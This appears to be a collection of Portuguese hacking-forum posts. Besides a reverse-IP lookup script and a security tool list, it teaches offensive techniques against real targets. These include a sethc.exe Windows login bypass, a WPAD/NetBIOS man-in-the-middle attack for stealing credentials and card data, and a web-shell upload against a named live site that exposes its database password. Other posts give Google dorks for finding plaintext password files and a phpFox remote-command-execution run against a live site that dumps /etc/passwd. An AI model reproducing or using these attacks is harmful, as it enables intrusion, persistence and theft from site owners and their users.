Ola a todos, trago este script que recodei e reformulei de um amigo para reverse ip.
Ele segue a mesma funcionalidade padrão de reverse lookups, basta inserir site ou ip no campo e continuar com Reverse para que sejam listados os sites correspondentes:

Imagem 1:

Imagem 2:

Por vias das duvidas, comentei o código e logo abaixo o src completo:

<?php
// Guarda a variavel vindo de post do form html
$domain = $_POST['domain'];
// Se domain exister podemos continuar o trabalho.
if(! $_POST['domain']==""){
// A variavel $reverse contem o site que iremos consultar no ato do reverse.
$reverse = "http://networktools.nl/reverseip/";
// Dentro de add ficara nosso ip ou site do reverse
$add = $domain;
// $connect ficara concatenado o site junto com nosso dominio, ja que no site do reverse
// ao consultarmos determinado site fica:
// http://networktools.nl/reverseip/ipdosite
$connect = $reverse.$add;
// $title diz ao nosso código com expressão regular que, devemos pegar tudo entre as tags <pre></pre>
$title = '#<pre>(.*?)</pre>#s';
// Variavel responsavel por guardar a execucação de curl, para facilitar as linhas do código.
$soket=curl_init();
// Mostrando ao curl qual url trabalhar.
curl_setopt($soket,CURLOPT_URL,$connect);
// Curl ira nos retornar o valor de $connect em string.
curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
// O valor de curl fica em $soket
curl_exec($soket);
// E por fim guardamos tudo dentro de uma variavel chamada $exec para execuçao
$exec=curl_exec($soket);
// Procure tudo de $title ('#<pre>(.*?)</pre>#s') com o que foi guardado em $exec e mande para $yaz.
preg_match_all($title,$exec,$yaz);
// Mande o valor de [0] localizado em yaz, e transforme em $yazdir, ira ajudar nas linhas do código.
foreach($yaz[0] as $yazdir){
// Enquanto isso iremos gerar uma variavel que dentro dela ira conter instruçoes para substituirmos
// Strings especificas capturadas no sites no caso Encontre: 'Domains on' e troque por 'Sites no dominio'
$degis=ereg_replace("Domains on","Sites no dominio",$yazdir);
// Agora Basta imprimir na tela o resultado ja concatenado
echo "<center><b><span style='color: rgb(255, 255, 255);'>$degis</span></b></center>";
}
}
// Recoded e comentado por n4sss.
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>Reverse Lookup</title>
</head>
<body
 style="background-color: rgb(45, 45, 45); color: rgb(0, 0, 0);"
 alink="#ee0000" link="#0000ee" vlink="#551a8b">
<form method="post" action="">
  <div
 style="font-family: monospace; color: rgb(255, 255, 255); font-weight: bold;"
 align="center">Reverse
ip Lookup recoded
by n4sss</div>
  <div align="center"><span
 style="font-family: monospace; color: rgb(255, 255, 255); font-weight: bold;">Site/IP</span><br>
  <input name="domain" align="center"
 type="text"><input
 value="Reverse!" type="submit">
  </div>
</form>
<?php
// Guarda a variavel vindo de post do form html
$domain = $_POST['domain'];
// Se domain exister podemos continuar o trabalho.
if(! $_POST['domain']==""){
// A variavel $reverse contem o site que iremos consultar no ato do reverse.
$reverse = "http://networktools.nl/reverseip/";
// Dentro de add ficara nosso ip ou site do reverse
$add = $domain;
// $connect ficara concatenado o site junto com nosso dominio, ja que no site do reverse
// ao consultarmos determinado site fica:
// http://networktools.nl/reverseip/ipdosite
$connect = $reverse.$add;
// $title diz ao nosso código com expressão regular que, devemos pegar tudo entre as tags <pre></pre>
$title = '#<pre>(.*?)</pre>#s';
// Variavel responsavel por guardar a execucação de curl, para facilitar as linhas do código.
$soket=curl_init();
// Mostrando ao curl qual url trabalhar.
curl_setopt($soket,CURLOPT_URL,$connect);
// Curl ira nos retornar o valor de $connect em string.
curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
// O valor de curl fica em $soket
curl_exec($soket);
// E por fim guardamos tudo dentro de uma variavel chamada $exec para execuçao
$exec=curl_exec($soket);
// Procure tudo de $title ('#<pre>(.*?)</pre>#s') com o que foi guardado em $exec e mande para $yaz.
preg_match_all($title,$exec,$yaz);
// Mande o valor de [0] localizado em yaz, e transforme em $yazdir, ira ajudar nas linhas do código.
foreach($yaz[0] as $yazdir){
// Enquanto isso iremos gerar uma variavel que dentro dela ira conter instruçoes para substituirmos
// Strings especificas capturadas no sites no caso Encontre: 'Domains on' e troque por 'Sites no dominio'
$degis=ereg_replace("Domains on","Sites no dominio",$yazdir);
// Agora Basta imprimir na tela o resultado ja concatenado
echo "<center><b><span style='color: rgb(255, 255, 255);'>$degis</span></b></center>";
}
}
// Recoded e comentado por n4sss.
?>
</body>
</html>

Olá amigos do INW.
Confira este tutorial de como burlar a senha de usuario do Windows 7 e XP.

Tenha em mãos um CD de alguma distribuição Linux.De boot com o CD, selecione a opção “Experimentar Linux”, em seguida entre na pasta Windows/System32, renomeie este o arquivo “sethc.exe” para sethcOLD.EXE, em seguida copie o “cmd.exe” e cole na Area de Trabalho do Linux, então renomeie o “cmd.exe” para sethc.exe e coloque na pasta System32.

Reinicie o computador dando boot no windows, ao aparacer a tela de login, pressione 5 vezes a tecla Shift esquerdo, vai aparecer o CMD, digite o comando: control userpasswords2.Ao executar esse comando vai aparecer a tela de gerenciamento de usuários, selecione o administrador e mude a senha.

Autor: Tiagui99

Ola caros leitores,
Confiram esta lista feita pelo nosso amigo N3ro! dos programas que não podem faltar no linux de quem está no ramo de sergurança da informação.

> 1. Nmap

Nmap é um software livre que realiza port scan desenvolvido pelo Gordon Lyon, autoproclamado hacker “Fyodor”. É muito utilizado para avaliar a segurança dos computadores, e para descobrir serviços ou servidores em uma rede de computadores. Nmap é conhecido pela sua rapidez e pelas opções que dispõe. O Nmap é um programa CUI (Console User Interface), pelo que corre na linha de comandos, mas este tem uma interface gráfica (GUI), o NmapFE (Nmap Front End), que foi substituido pelo Zenmap em11 de Outubro de 2007, por ser uma versão portátil e prover uma interface melhor para execução e especialmente para visualização e análise dos resultados do Nmap.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 2. Aircrack

Aircrack-ng é um detector de redes, sniffer de pacote, aplicativo de quebra de WEP e ferramenta de análise para redes locais sem fios802.11. Funciona com qualquer placa wireless cujo driver suporta modo de monitoramento bruto (para uma lista, visite o website do projeto) e pode capturar e analisar (sniff) tráfego 802.11a, 802.11b e 802.11g. O programa roda no Linux, Windows e no Sharp Zaurus.

Características:

I) aircrack-ng –> Quebra chaves WEP e WPA and WPA (Busca por Força-bruta).
II) airdecap-ng –> Descriptografa arquivos capturados com criptograifa WEP ou WPA com a chave conhecida.
III) airmon-ng –> Coloca placas diferentes em modo monitor.
IV) aireplay-ng –> Injeção de pacotes (Somente em Linux).
V) airodump-ng –> Coloca tráfego do ar em um arquivo .cap e mostra informação das redes.
VI) airtun-ng –> É um criador de interface de túnel virtual.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 3. Nessus

Nessus é um programa de verificação de falhas/vulnerabilidades de segurança. Ele é composto por um cliente e servidor, sendo que o scan propriamente dito é feito pelo servidor. O nessusd (servidor Nessus) faz um port scan ao computador alvo, depois disso váriosscripts (escritos em NASL, Nessus Attack Scripting Language) ligam-se a cada porta aberta para verificar problemas de segurança. Estas falhas ou problemas podem ser descobertos por um grupo hacker, um único hacker, uma empresa de segurança ou pelo próprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que alguém tire vantagem destes com propósitos maliciosos.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 4. Snort

Snort é um software livre de detecção de intrusão para rede (NIDS) desenvolvido inicialmente por Martin Roesch, capaz de desenvolver análise de tráfego em tempo real e registro depacote em redes IP. Executa análise de protocolo, busca/associa padrões de conteúdo e pode ser usado para detectar uma variedade de ataques, tais como buffer overflows, stealth port scans, ataques CGI, SMB probes, OS fingerprinting, entre outras.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 5. WireShark

O Wireshark (anteriormente conhecido como Ethereal) é um programa que analisa o tráfego de rede, e o organiza porprotocolos. As funcionalidades do Wireshark são parecidas com o tcpdump mas com uma interface GUI, com mais informação e com a possibilidade da utilização de filtros. É então possível controlar o tráfego de uma rede e saber tudo o que entra e sai do computador, em diferentes protocolos, ou da rede à qual o computador está ligado.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 6. John the Ripper

John the Ripper é um software para quebra de senhas. Inicialmente desenvolvido para sistemas unix-like, corre agora em vários sistemas operativos (como DOS, Windows, Linux,BSD). Disponível em versão livre e paga, o John the Ripper é capaz fazer força bruta em senhas cifradas em DES, MD4 e MD5 entre outras.

O John the Ripper possui quatro modos de operação:

I) Dicionário (Wordlist) –> Sendo o modo mais simples suportado pelo programa, este é o conhecido ataque de dicionário, que lê as palavras de um arquivo e verifica se são correspondentes entre si.

II) Quebra Simples (Single Crack) –> Mais indicado para início de uma quebra e mais rápido que o wordlist, este modo usa técnicas de mangling e mais informações do usuário pelo nome completo e diretório /home em combinação, para achar a senha mais rapidamente.

III) Incremental –> Sendo o modo mais robusto no John the Ripper, ele tentará cada caractere possível até achar a senha correta, e por esse motivo é indicado o uso de parâmetros com o intuito de reduzir o tempo de quebra.

IV) Externo (External) –> O modo mais complexo do programa que faz a quebra a partir de regras definidas em programação no arquivo de configuração do programa, que irá pré-processar as funções no arquivo no ato da quebra quando usar o programa na linha de comando e executá-las. Este modo é mais completo e necessita de tempo para aprender e acostumar-se.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 7. Kismet

Kismet é um analisador de rede (sniffer), e um sistema de detecção de intrusão (IDS – Intrusion detection system) para redes 802.11wireless. Kismet pode trabalhar com as placas wireless no modo monitor, capturando pacotes em rede dos tipos: 802.11a, 802.11b e802.11g.

Recursos:

I) Quando ativado a placa de rede wireless fica em modo de monitoramento ou promíscuo, não permitindo ser usada para outros fins.
II) Pode descobrir pontos de acessos configurados para não divulgar o ESSID devido a captura passiva no modo monitor.
III) Pode descobrir qual o canal de rede mais congestionado.
IV) Permite integração com GPS.
V) O arquivo de captura de pacotes é compatível com Wireshark e Aircrack-ng.

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> 8. Metasploit Framework

Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits. Para escolher um exploit e payload, algumas informações sobre o sistema de destino é necessária, como versão do sistema operacional e serviços de rede instalados. Esta informação pode ser adquirida com escaneamento de portas e OS fingerprinting ferramentas como o nmap . Scanners de vulnerabilidade, tais como NeXpose ou Nessus pode detectar o sistema alvo vulnerabilidades . Metasploit pode importar dados de varredura de vulnerabilidade e comparar as vulnerabilidades identificadas para os módulos de exploração existentes para a exploração precisa.

> Links

- Wikipédia (EN) * O Wikipédia BR deletou o página
- Site Oficial
- Download (Linux)

> 9. Nikto

Web Scanner Nikto é um Scanner de servidor Web que testa servidores Web para arquivos perigosos / CGIs, software de servidor desatualizado e outros problemas. Ele realiza verificações de tipo genéricos e específicos do servidor. Ela também captura e imprime os cookies recebidos. O código Nikto em si é Open Source (GPL), porém os arquivos de dados usados ​​para dirigi-lo não o são.

> Links

- Wikipédia (EN) * O Wikipédia BR não possui informações
- Site Oficial
- Download (Linux)

> 10. Netcat

O Netcat é uma ferramenta de rede, disponível para sistemas operacionais Unix, Linux, Microsoft Windows e Macintosh que permite, através de comandos e com sintaxe muito sensível, abrir portas TCP/UDP e HOST. Permite forçar conexões UDP/TCP (útil para realizar rastreamento de portas ou realizar transferências de arquivos bit a bit entre os equipamentos).

> Links

- Wikipédia
- Site Oficial
- Download (Linux)

> Alternativa para Download

I) Ubuntu: apt-get install nome do programa
II) Fedora: yum install nome do programa
III) Open Suse: yum install nome do programa
IV) Debain: apt-get install nome do programa
V) Gentoo: emerge -S nome do programa
VI) Arch Linux: pacman -S nome do programa

> Considerações finais

Gostaria de ressaltar que inicialmente vi um tópico semelhante a esse “em um blog”, mas o mesmo está super desorganizado e pouco intuitivo, então a partir dele tive a ideia de criar um com o mesmo assunto, porém mais organizado e fácil de entender, espero que gostem!

Autor: N3ro! ( Postado no Forum Invaders )

Mais uma tentativa da Microsoft em dominar o mundo que deu errado e até hoje traz prejuízo aos usuários do Rwindows.
A ideia inicial era simplificar a configuração de proxies em grandes redes de computadores. A Micro$oft até tentou obrigar, no final da década de 90, o IETF (Internet Engineering Task Force) a tornar o protocolo padrão, mas não foi aprovado.
Também pudera… Trata-se do WPAD (Web Proxy Auto Discovery). Você agora vai entender como funciona esse protocolo e ver como ele é frágil.

Como funciona?
Em um simples resumo, o WPAD serve pra detectar e configurar um servidor de proxy automaticamente.
O WPAD, por padrão, já está ativo no browser quando ele está configurado para detectar as configurações de rede automaticamente. O Internet Explorer já vem com esta opção ativa.
Quando você digita o endereço do website, o navegador verifica pela existência de um arquivo PAC (Proxy Auto Configuration), com sintaxe JavaScript. Este arquivo deve estar na raiz do servidor web (por exemplo, no diretório public_html) com o nome ‘wpad.dat’ ou ‘proxy.pac’.
Este arquivo indica as configurações de proxy melhores para acessar aquele servidor. A partir de então vai utilizar as configurações indicadas para setar o proxy. Veja um exemplo de arquivo PAC:
Código:

function FindProxyForURL(url, host) {
	return "PROXY 192.168.1.1:3128";
}

Muito suspeito, não acha? Pois encerram-se as suspeitas e entram as evidências.

Como é invadido?
Nossa missão é realizar um ataque man-in-the-middle (MITM), aproveitando da fragilidade oferecida no modo em que o WPAD procura pelo arquivo PAC no servidor. Tudo isso sem que o alvo fique sabendo, nem mesmo enganado por engenharia social.
Vamos forjar este arquivo, configurando remotamente o navegador do usuário a usar nosso próprio proxy.
Há mais de uma maneira de executar o MITM por este protocolo, mas hoje vamos ver apenas explorá-lo spoofando pacotes NetBIOS.
Se você sniffar este protocolo, verá que há requisições broadcast (Endereço IP destinatário com final 255) NetBIOS, do tipo WPAD.
Para iniciar o ataque vamos precisar de um webserver, para podermos explorar o nosso arquivo PAC (wpad.dat). Vamos criar nosso arquivo, configurando-o com nosso endereço IP:
Código:

function FindProxyForURL(url, host) {
	return "PROXY SEU.IP.AQ.UI:8080";
}

Grave este arquivo na raíz do webserver (/var/www, /home/user/public_html, C:\wamp\www…). Ele será acessado pelo endereço http://seu.ip.aq.ui/wpdat.dat.
Vamos configurar também um servidor proxy. Você pode Burp Suite ou InterProxy, este último desenvolvido pelo WhiteCollarGroup. Se não me falha a memória, acredito que o Acunetix também possui um servidor proxy. Utilize seu predileto.
Leve em conta que, além de ter o servidor proxy ativo, você vai precisar sniffar todo o tráfego do proxy. O Burp Suite, como é um software desenvolvido para análise de rede, já possui essa funcionalidade. Outros servidores comuns não possuem tal funcionalidade, mas você não precisa deixar de utilizar seu servidor predileto por causa disso. Utilize sniffers como Wireshark ou SocketSniff (tradução SocketSniff para português).
Coloque seu proxy para escutar na porta 8080 (levando em conta que indicamos a porta 8080 no arquivo PAC). Se necessário, coloque também seu sniffer para capturar dados trafegados por essa porta.
Feito isso, vamos spoofar os pacotes NB. Vamos utilizar o Nbpoison.
Após o download, execute no terminal como root:
Código:

./nbpoison -s seu.ip.aq.ui

A partir daí, usuários de sua rede utilizarão sua máquina para requisições broadcast, e sua máquina está preparada para responder a essas requisições.
Se você ler os logs do Apache, vai perceber que usuários estão fazendo requisições em método GET ao seu arquivo wpad.dat. Com isso você saberá que o alvo já importou suas configurações, e já está utilizando sua máquina como proxy.

Por que é invadido?
Se você voltar à janela do sniffer, verá que todos os dados trafegados passam por ele.
Isto quer dizer que é possível ler dados privilegiados, mesmo em método POST (dados enviados em oculto pelos headers HTTP) e cookies.
Ou seja, você poderá ler desde credenciais de e-mails e redes sociais até dados de cartões de crédito.

Este é um ataque em que o alvo pode desconhecer o fato antes, durante e depois de ser atacada.

Autor: 0KaL

Salve galera, neste tutorial vou mostrar como upar uma shell imagem usando o AddOn Tamper Data e algumas considerações sobre manter o acesso.

Primeiramente, precisamos de um alvo.
Separei um pra vcs em que fica como tarefa conseguir o login e o painel admin.

http://www.theolia.com.br/pt/theolia…ias.php?cod=10

Agora que vc ja possui acesso, vamos fazer algumas considerações. Eu disponibilizei o link para estudo geral do forum.
Então por favor, se vc eh um Lammer e deseja impedir o bom funcionamento do tutorial pare por aqui.
Não posso impedir seus atos, mas peço um pouco de respeito para o beneficio de geral.

Continuando….

Agora que estamos dentro (e você provavelmente ja adquiriu o Tamper Data para o seu firefox) vamos procurar um local para upload.
Em noticias é possível cadastrar uma nova noticia. Façamos isso.

Perceba que aparece duas opções: GALERIA e DOCS.
Como nosso objetivo eh upar a shell em formato de imagem vamos em Galeria.

Nessa hora vc deve renomear sua shell.php para shell.php.jpg
Selecione sua shell.php.jpg mas antes de inserí-la, comece a iniciar alteração com o Tamper Data

Feito isso vamos inserir nossa shell.
Perceba que o Tamper Data pergunta se vc gostaria de fazer alteração na requisição.
Vamos alterá-la. Em valor do POST procure o nome da sua shell e renomeie a novamente para shell.php e envie

Você vai perceber que vai ter um erro sobre o tamanho da “imagem” e blablabla…

Ai vc me fala. Poha que tutorial inutil, se vai dar erro pra q ensinar essa merda???
Perseverança meu caro. Muitos talvez desistissem ai. Ainda tem o DOCS, que provavelmente n vai reclamar do tamanho do arquivo.
Eu n precisava ter ido por esse caminho no tutorial, mas queria mostrar que erros acontecem.

Bom, vamos aos DOCS
Tente upar qualquer arquivo pra ele retornar o erro do tipo de arquivo q ele aceita.

“Arquivo inválido! Ele deve ser PDF, DOC, DOCX, XLS ou XLSX.”

Certo. Vamos renomear nossa shell para shell.php.DOC então.
Vamos localiza-la, ativar o Tamper Data (msm procedimento passado), renomeá-la na alteração para shell.php e enviar.
Vuala. Nossa shell foi upada.
Veja só:

Vamos agora ao site, achamos nossa noticia e la esta nossa shell.

Para ver as noticias acessem: http://www.theolia.com.br/pt/theolia_noticias.php

Vamos abrir.
Pra nossa decepção ela está como um arquivo txt.

Voltamos ao local de upload e tentando entender oq aconteceu. Percebemos o seguinte:
1- Retiramos a extensão .DOC, então nosso arquivo ficou shell.php
2- Mas seu nome aparece como teste e apenas isso.
3- Então oq aconteceu foi que a parte anterior a extensão foi substituida pelo nome que escolhemos e a extensão foi retirada pelo Tamper Data

Então basta chamarmos o arquivo de shell.php
E dessa forma:

Agora basta vc ser feliz

Agora que temos acesso eh sempre bom deixar algumas formas para mantê-lo.

Podemos upar shell em diretorios com muitos arquivos e claro renomeá-las para nomes menos sugestivos
como config.php, notes.php…. Nada que chame atenção e nada que seja visualizado bastante pelo administrador
Uma idéia eh deixar paginas de simples upload, que podem ser menos chamativas pelo tamanho e conteudo.

Ler os arquvios também é interessante.

Podemos ver coisas como:

<?php include("system/php_incs/conecta.php"); ?>

E achar o login do banco de dados

$nomedoservidor = 'dbmy0014.whservidor.com';
$usuariodobanco = 'theolia';
$senhadobanco   = 'fnh838';
$basededados    = 'theolia';

Que muitas vezes é o msm login do FTP e/ou do Cpanel.

No dia 03/04/2012 foi exposto uma vulnerabilidade no MOWPOP do WordPress que permitia upload de imagens no servidor

http://1337day.com/exploits/17931

Dessa forma era possivel upar sua shell.

Bom eh isso.
Se você conseguiu aprender a técnica n impessa que outros aprendam também.

Espero que tenham gostado
Se não, na próxima prometo melhorar ;D

Vlw
Autor: 5k4ll

O footprinting, geralmente, é a primeira parte de uma invasão ou pentest. Trata-se da busca de informações, usando mecanismos de pesquisas, whois, engenharia social e outros meios.
Esta é uma etapa indispensável, pois você conhece o sistema do alvo, os públicos utilizados, pesquisa suas vulnerabilidades, baixa estes públicos utilizados e os testa em sua máquina.
Normalmente, acelera o trabalho de um hacker.

Agora, vamos ver sua importância no deface. Digamos que você queira invadir um website que utiliza um sistema de fórum muito conhecido, como PHPBB, e sistema de portal em mesma condição, como o PHP Nuke. A partir daí, você deve entrar em websites de pesquisa de vulnerabilidade (de preferência, cadastrando-se no newsletter), e baixar esses scripts para o seu computador, para que você tenha acesso a áreas que não teria como visitante, e assim pesquisar suas vulnerabilidades.

Vamos ver um exemplo disso na prática?
Vou dar dois exemplos de scripts públicos, utilizados em larga escala, vulneráveis.

O primeiro diz respeito à um sistema de segurança desenvolvido pela Viagiz e distribuido em diversos websites de compartilhamento de scripts open-source. Baixamos o script e o colocamos no servidor.
Vemos sua área de administração e o mais importante: “desfribamos” o código e vemos como é feito o cadastro de usuários e a autenticação.
Olha só que interessante: os dados são guardados no diretório /usuarios, em arquivos de texto, e a senha não está criptografada.
Agora, vamos usar o Google para pesquisar por websites vulneráveis, pesquisando por:
Código:

intitle:Página
intitle:Protegida
intitle:Desenvolvido
intitle:por
intitle:Viagiz.com

Olha só que listão! Vamos entrar em qualquer um deles?
Agora, que tal olhar a URL e trocar entrar.php?(…) por usuarios? Temos a lista de usuários cadastrados. Abrimos qualquer um e temos sua senha! Que incrível!

Agora, vejamos o segundo exemplo. Trata-se de um software criado pela CoffeeCup, chamado Password Wizard. Seu design é sempre o mesmo, em horizontal ou vertical. Baixando o software e o testando, você vê que ele guarda os usuários em um arquivo chamado (nome do projeto).apw.
Vamos pesquisar no Google por:
Código:

login.swf

Vamos ver qualquer um, entrar no código-fonte e procurar pela EMBED ou OBJECT responsável pelo formulário de login (neste caso, em flash). Pegue o nome do arquivo SWF e abra-o, trocando a extensão .swf por .apw. Navegue até o fim do arquivo e… pronto!

Estes dois exemplos foram para se ter uma ideia e para reforçar a hipótese apresentada no início do post. Procure não utilizar softwares automáticos, leia os HTTP Headers e conheça bem o alvo antes de começar o ataque.

Até a próxima!

Autor: 0KaL

Foi descoberta no dia 7 de fevereiro de 2012 e liberada em público anteontem (23/03/2012) uma vulnerabilidade no software phpFox, uma rede social em PHP, muito utilizado.
A vulnerabilidade está presente na versão 3.0.1 ou anterior. Trata-se de Remote Command Execution.
Uma atualização foi liberada (versão 3.0.2), mas nem todo administrador tem saco pra ficar atualizando seus sistemas (essa é a verdade).

É daquelas falhas que há um exploit que já faz tudo pra você. Vou mostrar como utilizar o exploit, mas antes, vamos entender a falha, que está no arquivo /include/library/phpfox/module/module.class.php, acessado pelo arquivo /ajax.php, das linhas 716 até 754. Veja:

 716.            $aParts = explode('.', $sClass);
    717.            $sModule = $aParts[0];
    718.            $sComponent = $sType . PHPFOX_DS . substr_replace(str_replace('.', PHPFOX_DS, $sClass), '', 0, strlen($sModule . PHPFOX_DS));
    ...
    748.            if (preg_match('/(.*?)\((.*?)\)/', $sComponent, $aMatches) && !empty($aMatches[2]))
    749.            {
    750.                eval('$aParams = array_merge($aParams, array(' . $aMatches[2] . '));');
    751.
    752.                $sComponent = $aMatches[1];
    753.                $sClass = $aMatches[1];
    754.            }

Note que o vilão principal é a função eval(). Eu sempre digo: eval is evil. Evite ao máximo dos máximos utilizar esta função.
No eval, o programador declara uma variável ao resultado de uma função, array_merge(), mas não trata as variáveis já declaradas utilizadas dentro do eval().
Solução: Atualizar para o phpFox 3.0.2.
Fechando a função array_merge, é possível executar outros códigos. Este exploit permite que você execute códigos no terminal do sistema. Vamos utilizá-lo?
Primeiro, pegue-o aqui. Baixe o arquivo ou copie e salve seu conteúdo.
Você precisa ter instalado o PHP.
Para encontrar websites vulneráveis, utilize a dork:

intext:"Powered by phpFox Version 3.0.1"

Encontramos este website: www.valestream.com
Então, no bash/DOS digite (suponhando que o exploit está salvo como ‘phpfox.php’):

php phpfox.php www.valestream.com /

Explicando:

php phpfox.php => diz ao PHP para executar o arquivo phpfox.php
www.valestream.com => domínio
/ => local da instalação do phpFox
Como neste caso o sistema estava rodando na raiz, colocamos apenas uma barra. Se ele estivesse instalado no diretório “phpfox”, digitaríamos ‘/phpfox’.

Veja o resultado:

nonono@debian:/nonono$ php phpfox.php www.valestream.com /

+----------------------------------------------------------+
| phpFox <= 3.0.1 Remote Command Execution Exploit by EgiX |
+----------------------------------------------------------+

phofox-shell#

Vamos testar:

phofox-shell# id
uid=1041(t2ypafw4) gid=1033(t2ypafw4) groups=1033(t2ypafw4)
phofox-shell# uname -a
Linux server6.hostinro.com 2.6.18-164.9.1.el5 #1 SMP Tue Dec 15 20:57:57 EST 2009 x86_64 x86_64 x86_64 GNU/Linux
phofox-shell# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:101:103:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
hostinro:x:504:501::/home/hostinro:/usr/local/cpanel/bin/noshell
rivonze:x:508:504::/home/rivonze:/usr/local/cpanel/bin/noshell
gabi0001:x:509:505::/home/gabi0001:/usr/local/cpanel/bin/noshell
anndreii:x:510:506::/home/anndreii:/usr/local/cpanel/bin/noshell
tomcat:x:102:99::/home/tomcat:/bin/bash
stefan1:x:514:510::/home/stefan1:/usr/local/cpanel/bin/noshell
trimitef:x:519:515::/home/trimitef:/usr/local/cpanel/bin/noshell
avaos:x:520:516::/home/avaos:/usr/local/cpanel/bin/noshell
csl2ro:x:521:517::/home/csl2ro:/usr/local/cpanel/bin/noshell
mosnicol:x:524:520::/home/mosnicol:/usr/local/cpanel/bin/noshell
pariulzi:x:527:523::/home/pariulzi:/usr/local/cpanel/bin/noshell
cameliab:x:529:525::/home/cameliab:/usr/local/cpanel/bin/noshell
valeabuz:x:530:526::/home/valeabuz:/usr/local/cpanel/bin/noshell
recomand:x:531:527::/home/recomand:/usr/local/cpanel/bin/noshell
jordivil:x:1005:1000::/home/jordivil:/usr/local/cpanel/bin/noshell
recom:x:1006:1001::/home/recom:/usr/local/cpanel/bin/noshell
promovar:x:1007:1002::/home/promovar:/usr/local/cpanel/bin/noshell
cautpeci:x:1008:1003::/home/cautpeci:/usr/local/cpanel/bin/noshell
iaudepen:x:1010:1005::/home/iaudepen:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:1009:503::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
artnudep:x:1011:1006::/home/artnudep:/usr/local/cpanel/bin/noshell
clamav:x:103:104:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
driveren:x:1016:1010::/home/driveren:/usr/local/cpanel/bin/noshell
servicel:x:1017:1011::/home/servicel:/usr/local/cpanel/bin/noshell
kameniro:x:1018:1012::/home/kameniro:/usr/local/cpanel/bin/noshell
lumio:x:1019:1013::/home/lumio:/usr/local/cpanel/bin/noshell
stefan:x:1021:1015::/home/stefan:/usr/local/cpanel/bin/noshell
eventtra:x:1022:1016::/home/eventtra:/bin/bash
filmeb:x:1024:1017::/home/filmeb:/usr/local/cpanel/bin/noshell
hostings:x:1026:1019::/home/hostings:/usr/local/cpanel/bin/noshell
raduz:x:1028:1021::/home/raduz:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
tpech6fr:x:1029:1022::/home/tpech6fr:/usr/local/cpanel/bin/noshell
br2m8cle:x:1030:1023::/home/br2m8cle:/usr/local/cpanel/bin/noshell
stefan4:x:1035:1027::/home/stefan4:/usr/local/cpanel/bin/noshell
v9traj6t:x:1036:1028::/home/v9traj6t:/usr/local/cpanel/bin/noshell
procasim:x:1037:1029::/home/procasim:/bin/false
ukick:x:1038:1030::/home/ukick:/usr/local/cpanel/bin/noshell
mabis:x:1040:1032::/home/mabis:/usr/local/cpanel/bin/noshell
t2ypafw4:x:1041:1033::/home/t2ypafw4:/usr/local/cpanel/bin/noshell
smedia:x:1042:1034::/home/smedia:/usr/local/cpanel/bin/noshell
p6v9tp6t:x:1044:1036::/home/p6v9tp6t:/usr/local/cpanel/bin/noshell
pr3wr9tp:x:1045:1037::/home/pr3wr9tp:/usr/local/cpanel/bin/noshell
wr4ph4n9:x:1046:1038::/home/wr4ph4n9:/usr/local/cpanel/bin/noshell
ropiese:x:1047:1039::/home/ropiese:/usr/local/cpanel/bin/noshell
